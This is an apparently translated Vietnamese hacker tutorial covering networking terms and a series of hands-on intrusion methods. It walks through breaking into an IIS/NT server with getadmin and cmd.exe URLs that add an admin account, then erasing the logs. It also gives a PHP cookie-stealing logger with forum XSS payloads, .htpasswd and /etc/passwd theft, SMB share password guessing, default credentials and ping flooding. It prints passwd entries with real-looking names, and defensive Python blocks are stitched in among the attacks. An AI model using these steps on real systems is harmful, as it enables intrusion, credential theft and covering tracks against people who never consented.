Hacker document (tài liệu hacker)

Upload: nguyen-cong-hieu

Posted on 04-Apr-2018


7/30/2019 Tài Liệu Hacker

1/59

The most basic knowledge for becoming a hacker - Part 1

Many newbies have asked me what hacking is and how to hack. But they forget one thing: you first need a general body of knowledge and an understanding of the terms that people who know networking use. I myself am not all that skilled, but through study I have gathered some basic knowledge that I want to share with all of you, so that we can learn together.

I will not be responsible if you use this to harass other people. You may copy or post it on other websites, but please put the author's name under the article; respecting this article is respecting me and my effort, and also respecting yourselves. I have also inserted some basic hacking and cracking methods and examples here, which you can try out and study to understand more; then, when you come across a term you do not understand, read this article to find out. In it I have used parts of articles I found very good on the HVA website and on other websites I have visited. Thanks to the authors who wrote those articles. Now to the main subject.

1.) What do we need to start?

Many of you may not agree with me, but the best way to practise is to start with Windows 9X and then move on to the more powerful systems, Linux or Unix. Below is what you need:

+ An OS (it can be DOS, Windows 9X, Linux, Unix...)
+ A good website (HVA, for example)
+ A good web browser (Netscape, IE, but the best is probably Mozilla)
+ A good chat tool (mIRC, Yahoo Messenger...)
+ Telnet (or similar tools such as nmap)
+ The most important thing for anyone who wants to become a hacker: a little programming knowledge (C, C++, Visual Basic, Perl...)

2.) What is an IP address?

An IP address is divided into 4 numbers, each in the range 0-255. Each number is stored in 1 byte, so an IP address is 4 bytes in size, and addresses are divided into classes. There are 3 classes: A, B and C. In class A we can have 16 million addresses; class B has 65536 addresses. For example, class B with 132.25, we have all the addresses from

[...]

... information received! (HVA document)

5.) What are a Trojan, a worm, a virus and a logic bomb?

Trojan: put simply, this is a spy program installed on someone else's machine to steal documents from that machine and send them back to its owner. What it steals can be passwords, accounts or cookies, depending on what the person who installed it wants.

Virus: put simply, this is a program with special code that is installed on (or spreads from another machine to) the victim's machine and carries out what that code demands; most viruses are used to destroy data or damage the computer.

Worm: this is an independent program that can replicate itself and spread throughout a network. Like a virus, it can destroy data or damage the inside of the network, and sometimes it even brings the whole network down.

Logic bomb: a program that sends many data packets at once to the same address, flooding the system and choking the connection (on a server), or used as a tool to terrorise an opponent (mail bomb).

6.) What is PGP?

PGP stands for Pretty Good Privacy. It is a tool that uses public-key encryption to protect email files and data; it is a high-security form of encryption available as software for MS-DOS, Unix, VAX/VMS and other platforms.

7.) What is a proxy?

A proxy gives users Internet access through single hosts. Proxy servers serve a particular protocol, or a set of protocols, running on a dual-homed host or a bastion host. The user's client programs go through the proxy server as an intermediary in place of the real server the user wants to talk to. The proxy server examines the requests from the client and decides whether or not to serve them; if a request is served, the proxy server connects to the real server on the client's behalf, keeps forwarding the client's requests to the server, and returns the server's responses to the client. So the proxy server acts like a bridge between server and client.


A proxy lets users access Internet services in a direct sense. With a dual-homed host you have to log in to the host before using any Internet service. That is usually inconvenient, and some people get frustrated when they feel they are going through a firewall; a proxy solves this problem. Of course it also requires new protocols, but in general it is fairly convenient for the user. Because a proxy lets users access Internet services from their own systems, it does not allow packets to travel directly between the user's system and the Internet. The path is indirect, through a dual-homed host or through a combination of a bastion host and a screening router.

(Article by Z3RON3, HVA document)

8.) What is Unix?

Unix is an operating system (like Windows). It is currently the most powerful operating system and the one closest to hackers. If you become a real hacker, this OS is indispensable to you. It is used to support programming in the C language.

9.) What is Telnet?

Telnet is a program that lets us connect to another machine through a port. Every computer or server has ports; here are some common ones:

+ Port 21: FTP
+ Port 23: Telnet
+ Port 25: SMTP (Mail)
+ Port 37: Time
+ Port 43: Whois

Example: you can type Telnet to connect to mail.virgin.net on port 25.

10.) How do I know I have telnetted to a Unix system?

OK, I'll tell you how a Unix system greets you when you connect to it. First, when you call a Unix system, it usually shows a prompt: Login: (however, that alone does not guarantee it is Unix, unless a banner appears before the login: prompt, for example: Welcome to SHUnix. Please log in.) Now we are at the login prompt; you need to enter a valid account. An account usually has 8 characters or more. After you enter the account, you will see a password prompt; try entering a default password from the following table:

Account       Default Password
Root          Root
Sys           Sys / System / Bin
Bin           Sys / Bin
Mountfsys     Mountfsys
Nuuc          Anon
Anon          Anon
User          User
Games         Games
Install       Install
Demo          Demo
Guest         Guest

11.) What is a shell account?

A shell account lets you use your computer as a terminal through which you can type commands to a computer running Unix. The shell is the program whose job is to interpret the characters you send and pass them on to be executed as Unix commands. With a proper shell account you can use a workstation far more powerful than anything you could imagine. You can get a free shell account at www.freeshell.com; however, you will not be able to use telnet until you pay for it.

12.) How can you crack Unix account passwords?

Very simple; however, the method I describe here is outdated. You may crack them if you are lucky; if not, treat this as reference material. First, log in to a Unix system as a customer or a visitor; if you are lucky, you will get the password file that standard systems keep in:


    /etc/passwd

Each line in a passwd file holds a different account and looks like this line:

```
userid:password:userid#:groupid#:GECOS field:home dir:shell
```

where:
+ userid = the user id name: the login name; it can be a name or a number.
+ password: the password. You surely know what that is for.
+ userid#: a unique number given to the user when they first register.
+ groupid#: similar to userid#, but used for people who belong to a group (like HVA's Hunter Buq group, for example).
+ GECOS FIELD: this holds information about the user, such as full name, phone number, address, etc. It is also a good source for cracking a password.
+ home dir: the directory that records the visitor's activity when they visit (like the History folder in IE).
+ Shell: the name of the shell that starts automatically when we log in.

Take the password file, bring the encrypted text file home, then use the CrackerJack or John the Ripper program to crack it.

You think that was pretty easy, don't you? Wrong: it is not easy, and only with luck can you crack it, because nowadays most systems hide it very carefully. Read on and you will see where the difficulty lies.

13.) What is a shadowed password?

A shadowed password is what you see in the Unix passwd file when, after you enter a password, others only see a placeholder for it (such as X or *). This tells you that the password file is kept somewhere else, where an ordinary user cannot get to it. Do we give up? Of course not, not if we are hackers: if we cannot get directly to the shadowed password file, we look for its backup, the unshadowed file.

These files are not in a fixed place on Unix systems; try the following paths one by one:

```
AIX 3                  /etc/security/passwd            !
                       or /tcb/auth/files/ /
A/UX 3.0s              /tcb/files/auth/?/              *
BSD4.3-Reno            /etc/master.passwd              *
ConvexOS 10            /etc/shadpw                     *
ConvexOS 11            /etc/shadow                     *
DG/UX                  /etc/tcb/aa/user/               *
EP/IX                  /etc/shadow                     x
HP-UX                  /.secure/etc/passwd             *
IRIX 5                 /etc/shadow                     x
Linux 1.1              /etc/shadow                     *
OSF/1                  /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x         /tcb/auth/files/ /
SunOS4.1+c2            /etc/security/passwd.adjunct    ##username
SunOS 5.0              /etc/shadow  maps/tables/whatever
System V Release 4.0   /etc/shadow                     x
System V Release 4.2   /etc/security/* database
Ultrix 4               /etc/auth[.dir|.pag]            *
UNICOS                 /etc/udb
```

Before the first / on each line is the name of the corresponding system; find the actual system you want and follow the path after the first /.

And finally, here are some account passwd entries that I once cracked; they have probably expired by now:

```
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh
arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh
```

To protect their privacy I deleted their passwords and put an x in their place; see what information you can work out from these entries.
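The field layout from section 12 and the shadowing rule from section 13 can be checked mechanically. The following parser and audit routine are an added example (not part of the original document); the passwd lines it reads are constructed for illustration, and the audit flags the case the page warns about, a hash still sitting in the world-readable passwd file instead of a shadow marker.

```python
"""Parse /etc/passwd records and flag entries whose password field is not shadowed.

Added example, not from the original document. SAMPLE_PASSWD below is constructed;
the field order follows the page: userid:password:userid#:groupid#:GECOS:home:shell
"""
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample: one normal shadowed account, one account whose crypt(3)-style
# hash still sits in passwd itself, one account with an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1001:1000:Alice Example,,555-0100:/home/alice:/bin/ksh
legacy:AbCdEfGhIjKlM:1600:1000:Old Account:/home/legacy:/bin/ksh
guest::1601:1000:Guest:/home/guest:/bin/sh
"""

# Values that mean "the real hash lives in the shadow file" or "login disabled".
SHADOW_MARKERS = {"x", "*", "!", "!!", "*LK*"}


@dataclass
class PasswdEntry:
    userid: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd_line(line: str) -> PasswdEntry:
    """Split one passwd record into its seven colon-separated fields."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError(f"expected 7 fields, got {len(fields)}: {line!r}")
    userid, password, uid, gid, gecos, home, shell = fields
    return PasswdEntry(userid, password, int(uid), int(gid), gecos, home, shell)


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (userid, reason) for every entry an administrator should look at.

    Reasons:
      "unshadowed-hash": the password field holds a hash instead of a marker, so
                         anyone who can read /etc/passwd can run an offline cracker.
      "empty-password":  no password at all.
      "uid-0":           a second account sharing root's numeric id.
    """
    findings: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        if not raw or raw.startswith("#"):
            continue
        entry = parse_passwd_line(raw)
        if entry.password == "":
            findings.append((entry.userid, "empty-password"))
        elif entry.password not in SHADOW_MARKERS:
            findings.append((entry.userid, "unshadowed-hash"))
        if entry.uid == 0 and entry.userid != "root":
            findings.append((entry.userid, "uid-0"))
    return findings


if __name__ == "__main__":
    for userid, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{userid}: {reason}")
```

Point the same routine at a real `/etc/passwd` and an empty result means every account is shadowed.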

End of Part 1

The most basic knowledge for becoming a hacker - Part 2

A virtual port is a natural number carried in the TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) header. As everyone knows, Windows can run several programs at once, and each of these programs has its own port for sending and receiving data.

For example, a machine with IP address 127.0.0.1 runs a web server, an FTP server, a POP3 server, etc. All of these services run on the one IP address 127.0.0.1, so when a packet arrives, how does our computer tell which service it is for: the web server, the FTP server or SMTP? That is why ports exist. Each service has a default port number: FTP's default port is 21, the web service's is 80, POP3's is 110, SMTP's is 25, and so on. The network administrator can change these default port numbers; if you do not know the port number on a server, you cannot connect to that service. You have probably heard of PORT MAPPING but may not know what it is or what it does. Port mapping is simply the process of changing a service's default port number to another number. For example, the web server's default port is 80, but sometimes you will see http://www.xxx.com:8080; 8080 here is the port number on host xxx, which the host's administrator has "mapped" from 80 to 8080.

(HVA document)

15.) What is DNS?

DNS stands for Domain Name System. A DNS server waits for connections on port 53, meaning that if you want to connect to that server you must connect to port 53. A server running DNS translates alphabetic hostnames into the corresponding numbers and vice versa. For example: 127.0.0.1 --> localhost and localhost --> 127.0.0.1.

(HVA document)

16.) A few words about WinGate:


WinGate is a simple program that lets you split connections. For example, you can share one modem between two or more machines. WinGate, used with various proxies, can hide you.

How can WinGate hide you? Follow me: telnet to port 23 on a server running the WinGate telnet proxy and you will get the prompt WinGate>. At this prompt, type the server name, a space, and the port you want to connect to. Example:

```
telnet wingate.net
WinGate> victim.com 23
```

We telnet to port 23 because that is the default port when WinGate is installed. Now the IP that the victim's machine captures from us is the IP of the server hosting the WinGate proxy.

How to find WinGates?
+ If you want to find static WinGate IPs (IPs that do not change), go to Yahoo or a search engine and search for cable modems. Search for cable modems because many cable modem users have WinGate so they can share the cable modem's broadband connection with the other machines in the same house. Or you can use port or domain scanners and scan port 1080.
+ To find the dynamic IPs (which change each time the user connects to the Internet) of WinGates, you can use Domscan or other scanning programs. If you use Domscan, enter any IP range in the first box and the number 23 in the second box. When you get results, try telnetting to each IP address found (as instructed above); if the WinGate> prompt appears, you have found a machine running WinGate.
+ From my experience, download wingatescanner and use it; there are plenty of copies on the net.

17.) A few words about Traceroute:

Traceroute is a program that lets you determine the route packets take from your machine to the target system on the Internet.

Look at the following example:

```
C:\windows > tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms 1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms 1216 ms 1233 ms
8 asianet.com (202.12.32.10) 1210 ms 1239 ms 1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms 1087 ms 1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms 1109 ms 1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms 1146 ms 1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms 1159 ms 1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
```

I need to know the route from my machine to a host on the Internet with IP address 203.94.12.54. I need to tracert to it! As you can see above, packets from my machine have to pass through 13 hops (links) on the network to reach 203.94.12.54. That is the route the packets take.

Look at the next example:

```
host2 # traceroute xyz.com
traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms
```

+ The first line gives the hostname and IP address of the target system. This line also tells us the TTL value [...]
+ On the third line, xyz.com (202.xx.12.34) receives a datagram with TTL=1 (the first router has already decremented it: TTL=2-1=1). However, xyz.com is not a router, so it sends back to traceroute an ICMP error message, "Port Unreachable". On receiving this ICMP message, traceroute knows it has reached the target system xyz.com and finishes its job there.
+ If a router does not reply within 5 seconds, traceroute prints an asterisk "*" (unknown) and goes on sending the next datagram to the target host!

Note: on Windows: tracert hostname; on Unix: traceroute hostname

(viethacker.net document)
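The TTL mechanism described above can be modelled without sending a single packet. The simulation below is an added example (not from the original document): each probe walks a constructed path, routers decrement the TTL and answer "Time Exceeded" when it reaches 0, the destination answers "Port Unreachable", and a router that never replies shows up as "*", exactly as in the traceroute listings on this page.

```python
"""Simulate how traceroute maps a path with TTL-limited probes.

Added example, not from the original document. The paths below are constructed;
nothing is sent on the network.
"""
from typing import List, Optional, Set, Tuple

TIME_EXCEEDED = "ICMP Time Exceeded"        # a router's reply when TTL reaches 0
PORT_UNREACHABLE = "ICMP Port Unreachable"  # the destination's reply to a UDP probe
NO_REPLY = None                             # router or host drops/filters ICMP

# The two-hop path from the second traceroute listing on the page: one ISP router,
# then the destination xyz.com.
PAGE_PATH = ["202.xy.34.12", "202.xx.12.34"]


def forward_probe(path: List[str], ttl: int, silent: Set[str]) -> Tuple[str, Optional[str]]:
    """Walk one probe along `path` (routers..., destination) with the given TTL.

    Returns (address of whoever replies, type of reply). Every router decrements
    the TTL before forwarding; when it hits 0 that router answers Time Exceeded.
    The last element of `path` is the destination host, which answers
    Port Unreachable because nothing listens on the probe's UDP port.
    """
    destination = path[-1]
    for hop_addr in path:
        if hop_addr == destination:
            return hop_addr, NO_REPLY if hop_addr in silent else PORT_UNREACHABLE
        ttl -= 1
        if ttl == 0:
            return hop_addr, NO_REPLY if hop_addr in silent else TIME_EXCEEDED
    return destination, NO_REPLY


def traceroute(path: List[str], silent: Set[str] = frozenset(), max_hops: int = 30) -> List[Tuple[int, str]]:
    """Send probes with TTL 1, 2, 3, ... and record who answered each one.

    A hop that does not reply (the 5-second timeout on the page) is recorded as "*";
    the trace stops once the destination itself replies, or at `max_hops`.
    """
    hops: List[Tuple[int, str]] = []
    for ttl in range(1, max_hops + 1):
        addr, reply = forward_probe(path, ttl, silent)
        if reply is NO_REPLY:
            hops.append((ttl, "*"))
            continue
        hops.append((ttl, addr))
        if reply == PORT_UNREACHABLE:
            break  # reached the target system, job done
    return hops


if __name__ == "__main__":
    for hop, addr in traceroute(PAGE_PATH):
        print(hop, addr)
```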

18.) Ping and how to use it:

Ping is a very simple concept but very useful for diagnosing a network. The history of the word "ping": a ping is the sound a submarine sends out when it wants to know whether another object is near it; if there is an object near the submarine, the sound wave hits the object and the echo that comes back is the "pong", so the submarine knows something is nearby.

On the Internet, the concept of ping is very similar to the history mentioned above. The ping command sends an ICMP (Internet Control Message Protocol) packet to a host; if the host "pongs" back, the host exists (or at least can be reached). Ping can also tell us how long a data packet takes to travel from our computer to a host. Pinging is easy: just open MS-DOS and type "ping ip_address"; by default it pings 4 times, but you can also type

```
ping ip.address -t
```

This makes the machine ping forever. To change the ping size, do this:

```
ping -l (size) ip_address
```

What ping does is send a packet to a computer, then measure how long the packet takes and how long it takes to come back; from this it determines the speed of the connection and the time a packet needs to go and return, split accordingly (called the "trip time"). Ping can also be used to slow down or crash a system with a ping flood. Windows 98 hangs after one minute of ping flooding (the connection buffer overflows because there are too many connections, so Windows decides to let it take a little rest). A ping flood attack takes up a lot of your own bandwidth, and you must have more bandwidth than the opponent (unless the opponent is a machine running Windows 98 and you have an average modem, in which case you will knock the opponent down after about a minute of ping flooding). Ping floods are not very effective against slightly stronger opponents, unless you have many lines and control a fair number of servers pinging together whose total bandwidth exceeds the opponent's.

Note: the DOS -t option does not cause a ping flood; it just pings the target continuously, with pauses between consecutive pings. On all Unix or Linux systems you can use ping -f to cause a real flood. In fact ping -f has to be there if you use a POSIX-compliant version (POSIX - Portable Operating System Interface based on uniX); otherwise it is not a real Unix/Linux, so if you use an operating system that calls itself Unix or Linux, it will have the -f parameter.

(HVA and viethacker.net documents)

19.) Technique for intruding into Windows NT from the Internet:

This was the first hacking lesson I practised when I started studying hacking; now I will show it to you. You will need some time to carry it out, because it is easy and yet hard. Let's begin:

First you need to find a server running IIS.
Then go to DOS and type FTP. Example:

```
c:\Ftp www.dodgyinc.com
```

(this site still worked when I practised on it; I do not know whether they have fixed it by now. If anyone has another site, please post it for everyone to try.)

If the connection succeeds, you will see some lines like these:

```
Connected to www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):
```


What we see above contains very important information: it tells us that the machine's NetBIOS name is Vdodgy. From this you can infer the account name NT uses, which we can exploit: the default name the FTP service assigns to it, if it has not been renamed, will be IUSR_VDODGY. Remember it, it will be useful to us. Enter "anonymous" as the user and the following line appears:

```
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
```

Now the password will be something we do not know yet; however, try typing anonymous as the password. If it is wrong, log in to the FTP service again, and remember that this time we do not use anonymous but Guest; try guest as the password and see what happens. Now type this command in DOS:

```
Cd /c
```

and you will see the result if you got in. Now quickly look for the cgi-bin directory. If you are lucky you will find it easily, because administrators usually put cgi-bin where we have just entered so that they can manage the site more easily. The cgi-bin directory can contain programs that you can abuse by running them from your web browser. Let's start messing around.

First, change to the cgi-bin directory and use the Binary command (you may not need this command), then type the command put cmd.exe. Next you need the hack files to install in this directory: search the net for the two most important files, getadmin.exe and gasys.dll. Download them and, once you have them, put them in the cgi-bin directory. OK, consider everything done; close the DOS window. Now type the following address into your browser:


```
http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY
```

After a few seconds you will get the reply below:

```
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator rights!
```

So you have impersonated the admin to get into the system; what you need now is to create an account for yourself. Type the following line in IE:

```
http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add
```

The command line above creates a login account for you with user: anhdenday and password: toilahacker. Now give this user the admin's rights; just type this command in IE:

```
http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday
```

That's it. Disconnect, go to Start menu -> Find and search for the computer www.dodgyinc.com. When it is found, choose Explore; NT Explorer opens and you enter the user and password from above (mine are user: anhdenday and password: toilahacker).

One problem is that when you break into this system it will be logged, so to erase your tracks go to Winnt\system32\logfiles, open the log file, delete the information related to you, and save it. If you want some kind of notice about the shared intrusion, change the date on the computer with the following URL:

```
http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03
```

Once done, delete getadmin.exe and gasys.dll from cgi-bin. The purpose of breaking into this system is to pinch the admin's password so that next time we can enter legitimately, so look for the SAM file (which holds the passwords of the admin


and the members) on the system and use the l0phtcrack program to crack the password (I have already posted a guide to using l0phtcrack v3.02; study it yourselves). Here is the link: http://vnhacker.org/forum/?act=ST&f=6&t=11566&s= When cracking is done you have the admin's user and password; now delete the user account (mine was anhdenday) to be safe. You can do whatever you like in the system, but do not delete all their documents, have pity on them. How do you feel, complicated isn't it? When I tried hacking this way, I fumbled around for a full 4 hours; once you are used to it, the second time will take less.

In Part 3 I will cover the Linux OS, how to bypass a website's password protection, how to hack the simplest kind of website, etc.

End of Part 2

The most basic knowledge for becoming a hacker - Part 3

20.) What is a cookie?

Cookies are small, structured pieces of data shared between a website and the user's browser. Cookies are stored as small text data files (under 4k in size). Sites create them to store, look up and recognise information about users who have visited the site and the areas they have passed through on the site.

This information can include the user's name or identifier, password, preferences, habits... The user's browser agrees to store the cookie on the machine's hard disk; not every browser supports cookies. After one visit to a site, the information about the user is stored in the cookie. On later visits to that site, the website can reuse the information in the cookie (such as the information related to logging in to a forum...) so the user does not have to log in again or re-enter other information. The problem is that many sites handle the reuse of the information stored in cookies inaccurately, check it incompletely, or encrypt the information in the cookie with weaknesses, which lets a hacker exploit it to get past the login door and take control of the site.


Cookies usually have the following components:

+ Name: chosen by the website's programmer
+ Domain: the domain name of the server that created and sent the cookie
+ Path: information about the path on the website you are viewing
+ Expiry date: the moment at which the cookie stops being valid.
+ Secure: if this value is set in the cookie, the information is encrypted while it travels between server and browser.
+ Other values: the specific data the web server stores to recognise the user later; these values contain no whitespace, semicolons or commas and are limited to about 4k.

(Viethacker.net document)
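The components listed above are exactly what a Set-Cookie header carries, so they can be parsed and checked. The code below is an added example (not from the original document); its two headers are constructed. It goes one step beyond the page's list by also checking the HttpOnly attribute, which keeps page scripts from reading the cookie and is the standard defence against the cookie-theft technique in the next section.

```python
"""Parse Set-Cookie headers into name, value and attributes, and flag weak ones.

Added example, not from the original document. WEAK_HEADER and HARDENED_HEADER
are constructed. The HttpOnly check is an addition beyond the page's attribute
list: without it, client-side script can read the cookie via document.cookie.
"""
from typing import Dict, List

MAX_COOKIE_BYTES = 4096  # the roughly 4k limit the page mentions

# Constructed samples: a session cookie as many old forums set it, and the same
# cookie with the attributes a defender would want.
WEAK_HEADER = "sessionid=abc123; Domain=forum.example; Path=/"
HARDENED_HEADER = ("sessionid=abc123; Domain=forum.example; Path=/; "
                   "Expires=Wed, 21 Oct 2026 07:28:00 GMT; Secure; HttpOnly")


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split 'name=value; Attr=val; Flag' into its parts.

    Attribute names are lower-cased; bare flags (Secure, HttpOnly) map to True.
    """
    parts = [p.strip() for p in header.split(";")]
    if "=" not in parts[0]:
        raise ValueError("Set-Cookie must start with name=value")
    name, value = parts[0].split("=", 1)
    attrs: Dict[str, object] = {}
    for part in parts[1:]:
        if not part:
            continue
        if "=" in part:
            key, val = part.split("=", 1)
            attrs[key.strip().lower()] = val.strip()
        else:
            attrs[part.lower()] = True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def check_set_cookie(header: str) -> List[str]:
    """Return a list of weaknesses found in one Set-Cookie header (empty = fine)."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    value = cookie["value"]
    issues: List[str] = []
    if "secure" not in attrs:
        issues.append("missing Secure: cookie is also sent over plain HTTP")
    if "httponly" not in attrs:
        issues.append("missing HttpOnly: readable by page scripts via document.cookie")
    if any(ch in value for ch in " \t;,"):
        issues.append("value contains whitespace, ';' or ',' and will be cut short")
    if len(header.encode("utf-8")) > MAX_COOKIE_BYTES:
        issues.append("header exceeds 4 KB; browsers may refuse to store it")
    return issues


if __name__ == "__main__":
    for label, header in (("weak", WEAK_HEADER), ("hardened", HARDENED_HEADER)):
        print(label, check_set_cookie(header) or "ok")
```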

21.) Technique for stealing a victim's cookie:

First, open Notepad and paste the following code into it:

```
[...]
}}
return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = $REMOTE_ADDR . ".txt";
$mode = "r+";
if (!file_exists($file))
    $mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
```

or

```
[...]
```

(Change [email protected] to your own email address.)

Save this Notepad file as <a name of your choice>.php (remember it must be .php) and upload it to some host that supports PHP; in my example it is abc.php. (For those of you who have built websites this will be very easy, won't it?) This code steals the victim's information (and sometimes the cookie too) when they open content containing this code, and automatically saves the information to a file <victim's ip>.txt.

There is another way to get cookies, used on forums that have this bug but have not fixed it: when posting, you just add the following code to your post:

```
document.write(` `)
```

where host_php is the address you uploaded the cookie-stealing file to, and abc.php is my example file.

Example: when used inside an img tag, we use it like this:

```
[img]http://www.quantrimang.com/%22javascript:[/img] `)\">
```

or:

```
[img]javascript: Document.write(``)\">
```

You can find websites to practise the method in this example by going to google.com and searching for forums with this bug using the keyword "Powered by .. forum" for the following forums: ikonboard, Ultimate Bulletin Board, vBulletin Board, Snitz. If you are lucky you may find forums that have not fixed this bug to practise on; whoever finds one, share it with everyone.

There are many other nice cookie-stealing scripts; look for more yourselves.


22.) How to bypass a website's password protection:

When you go looking for information on a website, some places on the site block you when you enter, and a box appears asking for a password. This is a private area that hides secret information reserved for a certain number of people or a certain group (the place where viethacker.net keeps its hacking craft, which the e-chip newspaper mentioned, for example). When we click on that link it (usually) calls .htpasswd and .htaccess, which sit in the same directory as the protected page. Why is there a dot before the file name .htaccess? Files whose names begin with a dot "." are treated by web servers as configuration files. These files are hidden when you browse the directory protected by the .htaccess file. These two files control access to the secure link you want to enter. One manages the passwords and user names, the other manages the encryption of that information for the first file. When you enter both correctly, the link opens. Look at this example:

```
Graham:F#.DG*m38d%RF
Webmaster:GJA54j.3g9#$@f
```

You can read the username, but do you understand the password? Of course not. Do you understand why you cannot read them? It is because of the intervention of the .htaccess file. Because they are in the same directory they interact to protect each other, so we are not foolish enough to try breaking in and cracking that damned password (as long as we have no password-cracking method in hand; I am also researching whether it can be entered directly, and if I succeed I will post it for you). Back to the point: what happens if .htpasswd lies outside the directory protected by the .htaccess file? We can pinch it easily. Look at the following example link:

```
http://www.company.com/cgi-bin/protected/
```

To check whether the .htpasswd file is protected by .htaccess, enter this URL:

```
http://www.company.com/cgi-bin/protected/.htpasswd
```


If you get the reply "File not found" or similar, the file is certainly not protected; find it with one of these URLs:

```
http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd
```

If you still do not find it, keep trying similar URLs (it might even be right in the root directory) until you find it. Once you have found this file, use the John the Ripper or Crackerjack program to crack the passwords stored in it. You surely know what to do next: take a valid user name and password, enter, and see what the place is hiding inside, but do not change their password or mess things up. You can also use this method to get the admin's password and those of most members of a closed group; they certainly have special privileges.

23.) About CGI

CGI stands for Common Gateway Interface. Most websites use CGI programs (called CGI scripts) to do the necessary work 24 hours a day. CGI scripts are really programs written and uploaded to the website in languages such as Perl, C, C++ and VBScript, of which Perl is the favourite because it is easy to write, takes little space and, above all, can run continuously 24 hours a day.

Usually CGI scripts are kept in the /cgi-bin/ directory of the website, as in this example:

```
http://www.company.com/cgi-bin/login.cgi
```

with specific jobs such as:
+ creating a visitor counter program;
+ allowing visitors to do some things and not others on your website;
+ managing members' user names and passwords;
+ providing mail services;
+ providing link pages and messaging between members;
+ providing detailed error reports, etc.

24.) The most basic way to hack websites through CGI scripts:

Bug 1: the nph-test-cgi bug

+ Type the vulnerable site's name into your browser.
+ Add the following to the end: /cgi-bin/nph-test-cgi
+ The URL will then look like this:

```
http://www.servername.com/cgi-bin/nph-test-cgi
```

+ If it works you will see the directories stored inside. To view a directory, add:

```
?/*
```

+ The password file is usually kept in the /etc directory; type this line in the URL:

```
http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*
```

Bug 2: the php.cgi bug

+ Similar to the above, you just type the following line in the URL to get the passwords:

```
http://www.servername.com/cgi-bin/php.cgi?/etc/passwd
```

The important thing is that these are old bugs, so finding websites to practise on is very hard; go to google.com and type the keywords:

```
/cgi-bin/php.cgi?/etc/passwd
```
or
```
cgi-bin/nph-test-cgi?/etc
```

then look through the results for a site that has not fixed the bug and practise on it.

25.) Technique for intruding into an online computer:

Breaking into an online computer is a technique that is both easy and hard. You can call it easy when you use the ENT 3 tool, but the problem with it is that the victim's machine slows down noticeably, and machines that do not share anything cannot be entered, so if they shut the machine down you are stuck before you have grabbed an account. There is a quieter way that slows things down less and can get in even when the victim shares nothing: use DOS commands to attack. OK, let's begin:

Use an IP scanning program such as ENT 3 to scan for the target IP.
Go to Start ==> Run and type cmd.
In the DOS window type the command net view

+ Example:
```
c:\net view 203.162.30.xx
```

Look at the result; if there are shares, great, just type the command net use:

+ Example:
```
c:\net use E: \\203.162.30.xx\C
```

If connecting to the victim's machine asks for a password, download a password-guessing program and use it (I suggest you get pqwak2 for guessing passwords on machines running Win98 or WinMe, and xIntruder for Win NT). Note that the two programs are used in the same way: on the first line you enter the victim's IP, on the second the name of the victim's shared drive; but for xIntruder you must set its Delay sensibly: on a LAN the Delay is 100, on the Internet around 5000.

If the victim's machine has no shares, type the command:

```
net use <drive>: \\<ip>\c$ (or d$) "administrator"
```

+ Example:
```
net use E: \\203.162.30.xx\C$ "administrator"
```


Sharing via c$ is the default on all machines whose USER is "administrator".

